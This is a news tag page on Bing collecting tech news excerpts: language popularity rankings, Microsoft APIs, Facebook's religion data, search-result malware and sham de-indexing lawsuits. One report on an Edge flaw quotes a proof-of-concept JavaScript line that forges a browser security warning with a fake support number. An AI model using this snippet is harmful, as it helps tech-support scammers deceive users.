Home Tags Bing

Tag: Bing

Go language soars to new heights in popularity

Go, Googlersquo;s open source, concurrency-friendly programming language, has soared to new heights with developers, cracking the top 10 in the Tiobe index of language popularity for the first time.With an all-time high rating of 2.363 percent, Go ranks as the 10th most popular programming language in this monthrsquo;s index, ahead of languages such as Perl, Swift, Ruby, and Visual Basic.

The Tiobe Programming Community index assesses language popularity using a formula based on frequency of searches for the languages in popular search engines such as Google, Bing, Baidu, and Wikipedia.[ Also on InfoWorld: Tap the power of Google's Go language. | The best Go language IDEs and editors. | Keep up with hot topics in programming with InfoWorld's App Dev Report newsletter. ]Tiobe called Gorsquo;s latest rise an important landmark and pondered what was next. “Is Go really able to join the big stars in the programming language world and leave languages such as JavaScript and Python behind? We will see.” The language was ranked in 55thnbsp;place in the index a year ago.

Gorsquo;s previous high score was a 2.325 percent rating in January, when it placed 13th.To read this article in full or to leave a comment, please click here

Kotlin’s a rising star in language popularity index

Boosted by its ties to Android mobile application development, Kotlin is a rising star in the Tiobe language popularity index.The statically typed language developed by JetBrains initially for the Java Virtual Machine, reached the top 50 in the index this month for the first time, ranking 43rd, although it has a rating of just 0.346 percent.
Still, this places Kotlin ahead of other more-established languages such as Groovy and Erlang. Kotlin was ranked 80thnbsp;just last month.[ Download the InfoWorld quick guide: Learn to crunch big data with R. | Tap the power of Googlersquo;s Go language. | InfoWorld looks at 6 best JavaScript IDEs and 22 JavaScript frameworks ready for adoption. ]Software quality services vendornbsp;Tiobersquo;s index assesses language popularity based on a formula that examines searches in popular search engines such as Google, Wikipedia, Bing, and Yahoo, looking at the number of skilled engineers, courses, and third-party vendors related to a language.To read this article in full or to leave a comment, please click here

Windows 10 S forces you to use Edge and Bing

Windows 10 S won't let you change default Web browser or search provider.

CA Purchase of Veracode Doesn’t Signal DevOps Consolidation: Analyst

DAILY BRIEFING: CA's Veracode deal not a sign of DevOps consolidation, analyst argues; Microsoft Power BI template enables intelligent Bing news searches; Google announces new SAP partnership, expands cloud support options; and there's more.

Google and Microsoft agree to demote piracy search results in the...

Deal struck after lengthy spat between search engines and entertainment industry.

Microsoft’s AI APIs add content moderation, speech recognition

If you want your apps to understand what someone’s saying or know if your user-content rules are being broken, Microsoft has you covered.Microsoft is expanding its portfolio of Cognitive Services—in-the-cloud APIs that provide out-of-the-box versions of useful algorithms—to include two new services that go into general availability next month: the Content Moderator and Bing Speech APIs.[ Jump into Microsoft’s drag-and-drop machine learning studio: Get started with Azure Machine Learning. | The InfoWorld review roundup: AWS, Microsoft, Databricks, Google, HPE, and IBM machine learning in the cloud. ]Talk to me, and I shall hear Bing Speech converts audio into text and vice versa.
It’s also able to apply contextual understanding to that speech or text.

The Speech API’s demo page lets you try a limited sample of both text-to-speech and speech-to-text for yourself.To read this article in full or to leave a comment, please click here

Google mistakes the entire NHS for massive cyber-attacking botnet

Hospitals advised to use Bing instead Exclusive  Google is blocking access to the entire NHS network, mistaking the amount of traffic it is currently receiving as a cyber attack.…

Facebook already has a Muslim registry—and it should be deleted

Enlarge / A Hollerith machine used in the 1890 US Census. Hollerith's company later merged with three others to create the company that later became known as IBM, and similar machines were instrumental in organizing the Holocaust.Marcin Wichary reader comments 84 Share this story Since Donald Trump's election, many in the tech industry have been concerned about the way their skills—and the data collected by their employers—might be used. On a number of occasions, Trump has expressed the desire to perform mass deportations and end any and all Muslim immigration. He has also said that it would be "good management" to create a database of Muslims, and that there should be "a lot of systems" to track Muslims within the US. In the final days of his presidency, Barack Obama has scrapped the George W.

Bush-era regulations that created a registry of male Muslim foreigners entering the US—the registry itself was suspended in 2011—but given Trump's views, demands to create a domestic registry are still a possibility. As a result, some 2,600 tech workers (and counting) have pledged both not to participate in any such programs and to encourage their employers to minimize any sensitive data they collect.

The goal is to reduce the chance that such data might be used in harmful ways. The fear in the tech community is of being complicit in some great crime.

The neveragain.tech pledge reads, in part: We have educated ourselves on the history of threats like these, and on the roles that technology and technologists played in carrying them out. We see how IBM collaborated to digitize and streamline the Holocaust, contributing to the deaths of six million Jews and millions of others. We recall the internment of Japanese Americans during the Second World War. We recognize that mass deportations precipitated the very atrocity the word genocide was created to describe: the murder of 1.5 million Armenians in Turkey. We acknowledge that genocides are not merely a relic of the distant past—among others, Tutsi Rwandans and Bosnian Muslims have been victims in our lifetimes. Today we stand together to say: not on our watch, and never again. Their concerns are not unfounded.
IBM, in particular, has a dark history when it comes to assisting with genocides.

The company's punch card-based Hollerith machines were instrumental in enabling the Nazis to efficiently round up Jews, seize their assets, deport them to concentration camps, and then systematically slaughter them. After Trump's election, IBM CEO Ginni Rometty wrote the president-elect to congratulate him on his victory and offer IBM's services in support of his agenda. Oracle co-CEO Safra Catz has joined Trump's transition team, rank and file workers have been outspoken in their unwillingness to cooperate with programs that don't, in their view, respect the Constitution or human rights or which have disturbing historical precedent. Rometty's letter has provoked a petition from current and former IBM staff; Catz's role has resulted in at least one resignation. One company, however, stands head and shoulders above the rest when it comes to collecting personal data: Facebook.

Facebook's business is data collection in order to sell more effectively targeted advertisements. While massive data collection is not new or unique to Facebook—search engines such as Google and Microsoft's Bing have the same feature—Facebook is unusual in that it actively strives to make that information personally identifiable.

Facebook accounts tend to use our legal names, and Facebook relationships tend to reflect our real-life associations, giving the company's data a depth and breadth that Google or Microsoft can only dream about. Among the pieces of personal information that the site asks users for is religion.

As with most pieces of information that Facebook requests, this is of course optional.

But it's an option that many people fill in to ensure that our profiles better reflect who we are. This data collection means that Facebook already represents, among other things, a de facto—if partialMuslim registry.

Facebook has the data already; the company can provide a list of self-attested Muslims in the US simply by writing a query or two.

That data could be similarly queried for anyone who isn't straight. As such, government coercion of Facebook—or even a hack of the company—represents a particular threat to civil liberties.

Accordingly, Facebook should take a simple and straightforward protective step: delete that information. Remove the field from our profiles, and discard the historic saved data. Deleting the information will not make Facebook safe.
It will still be a treasure trove of relationships and associations, and an intelligence agency could make all manner of inferences from the data contained within. (Religion, for instance, is likely to be discernible from the content of posts and from images of holidays and religious gatherings, but this would be more difficult to do in bulk—though we know similar inferences are already made about race.) But it would mean that Facebook is no longer so trivially searchable, and it would mean that it ceases to be such a clear database of religious affiliation. Making a change like this should be trivial for Facebook. No doubt it would marginally reduce the company's ability to tailor advertisements to individual users—but it would serve as a clear statement against the threat such a database poses.

Microsoft Edge’s malware alerts can be faked, researcher says

Fiddle with a URL and you can pop up and tell users to do anything Technical support scammers have new bait with the discovery that Microsoft's Edge browser can be abused to display native and legitimate-looking warning messages. The flaws exist in Microsoft's Edge protocols ms-appx: and ms-appx-web: which the browser uses to present warning messages when phishing or malware delivery sites are located. When Edge detects suspected Malicious sites it colours them red with a feature called "SmartScreen." Buenos Aires security tester Manuel Caballero says scammers can create warnings that replace SmartScreen text and phone numbers indicating that a nominated site also displayed in the address bar is infected. "When we place a telephone-like number a link is automatically created so the user can call us with a single click - very convenient for these scammers," Caballero says. By altering URL characters and appending a hash and a URL of a legitimate-looking site, a technical support scam page can be forged that is much more convincing than the deluge of fake Android and blue screen of death pages common to torrent sites. window.open("ms-appx-web://microsoft.microsoftedge/assets/errorpages/BlockSite%2ehtm?"+ "BlockedDomain=facebook.com&Host=Technical Support Really Super Legit CALL NOW\:"+ "800-111-2222#http://www.facebook.com"); Caballero found some of the Edge assets could be loaded directly through the address bar, albeit with errors, such as ms-appx-web://microsoft.microsoftedge/assets/errorpages/PhishSiteEdge.htm, while others would fail and perform a Bing search on the URL instead. The Edge proof-of-concept. Those errors could be avoided by changing a single character in URL, and the displayed address changed to a legitimate site by appending a hash. ® Sponsored: Flash enters the mainstream.
Visit The Register's storage hub

F-Secure Internet Security (2017)

Just what ingredients go into a security suite? It used to be a pretty clear recipe: antivirus, firewall, antispam, parental control, and various condiments. These days, though, some vendors reward their users by pushing suite-level features down into...

Search engine results increasingly poisoned with malicious links

Almost six times as many web page threats found this year compared to 2013 Malware threats in search results are getting worse despite the best efforts of Google and other vendors. The number of infected results has been increasing year by year since 2013 despite the application of multiple tools and technologies designed to exclude dodgy links, according to a study by independent anti-virus testing outfit AV-TEST.org. The analysed websites originate in various proportions from the search engines of Google, Bing, Yandex and Faroo.

Additionally, over the past two years, more than 515 million Twitter updates were examined for malicious links. Last year AV-TEST.org examined 80 million websites, spotting 18,280 infected web pages.
In the year up to August the testing lab inspected a similar 81 million websites turning up a much higher 29,632 infected web pages.

Both results were recorded without enabling Google Safe Browsing. Both figures are a big increase on 2013 when AV-TEST encountered 5,060 malware threats after examining 40 million web pages. All of the pages with malware threats found by AV-TEST were visited using the Google Safe Browsing tools.

The results were less than impressive. In 2015 the 18,280 pages with malware threats threw up Google warnings in just 555 of cases.
In the year to August of 29,632 malware-tainted pages threw up 1,337 Google warnings. Links in tweets are infected at almost exactly the same rate of frequency as links filtered by Google.

Graphs illustrating AV-TEST.org’s results can be found here. Maik Morgenstern, chief technology officer at AV-TEST.org, explained that the dynamic content of the web means it sees different content from Google/Bing when accessing and scanning the site.

This factor, together with the appearance of malicious ads, on previously clean websites goes some way in explaining the discrepancy. "It could be the ads on the website that have been flagged as suspicious by us and that changes every time you access the site," Morgenstern explained. "Or the website is delivering different content randomly or it does so by checking the user agent or location of the user. "Also I do not know what the interval is that Google/Bing are scanning the sites for malware.

There will always be a certain timeframe where malicious content could be on the site without Google/Bing knowing it, even if they were able to detect it.
It is also possible that we flagged content as suspicious that is not considered suspicious by Google/Bing." Google is yet to respond to El Reg’s request for comment. Microsoft (Bing) declined to comment. ®

Lawyers file fake lawsuits to de-index online negative reviews, suit says

EnlargeUrich Baumgartgen via Getty Images reader comments 3 Share this story Two California lawyers are being accused of filing "sham lawsuits" in a wide-ranging conspiracy to get Google and other search engines to de-index negative reviews about their clients.

As the case (PDF) brought by a group called Consumer Opinion states: The other conspirators engaged attorneys Mark W. Lapham ("Lapham") and Owen T. Mascott (“Mascott”) to file sham lawsuits either by the subjects of the negative reviews or by corporations that had no interest in the allegedly defamatory statements, against a defendant who most certainly was not the party that published the allegedly defamatory statements, and the parties immediately stipulated to a judgment of injunctive relief, so the conspirators could provide the order to Google and other search engines, thus achieving the goal of deindexing all pages containing negative reviews. Consumer Opinion runs pissedconsumer.com, and the group says these lawyers essentially manipulated California's legal system by conducting a "rather brilliant but incredibly unethical" scheme to make negative reviews on the site essentially disappear from search results.

The suit asks a federal judge to "discipline them for those misdeeds." The suit notes a complex web of reputation companies and fake or "stooge" defendants working together.

According to the lawsuit, it works like this: the attorneys sue the "stooge" authors of negative reviews—allegedly defamatory reviews that are published on the pissedconsumer.com site.

But these lawsuit defendants didn't actually write the review, and the suits immediately settle.

The judgements are then used to get Yahoo, Google, and Bing to erase negative reviews from search results.

The suit alleges that a Florida attorney, the subject of some 59 negative reviews on pissedconsumer.com, was among the beneficiaries of the alleged scheme. The lawsuit points out six similarly worded defamation lawsuits lodged in Contra Costa County, just east of San Francisco.

The suits are filed, according to the lawsuit, because pissedconsumer.com won't remove the reviews from its website. "The scam is not all that complicated," Marc Randazza, Consumer Opinion's attorney, wrote in the lawsuit. Mascott did not immediately respond for comment.

The answering machine for Lapham was full, so Ars could not leave a message. This isn't the first time we've seen these type of allegedly fake lawsuits try to game search results, according to Paul Alan Levy of Public Citizen and Eugene Volokh of the Volokh Conspiracy. The duo has concluded there are at least 25 cases nationwide with what they call a "suspicious profile." "Of these 25-odd cases, 15 give the addresses of the defendants—but a private investigator hired by Professor Volokh (Giles Miller of Lynx Insights & Investigations) couldn’t find a single one of the ostensible defendants at the ostensible address," they wrote. Levy and Volokh pointed out that search engines, when presented with a court order, "can't really know if the injunction was issued against the actual author of the supposed defamation—or against a real person at all."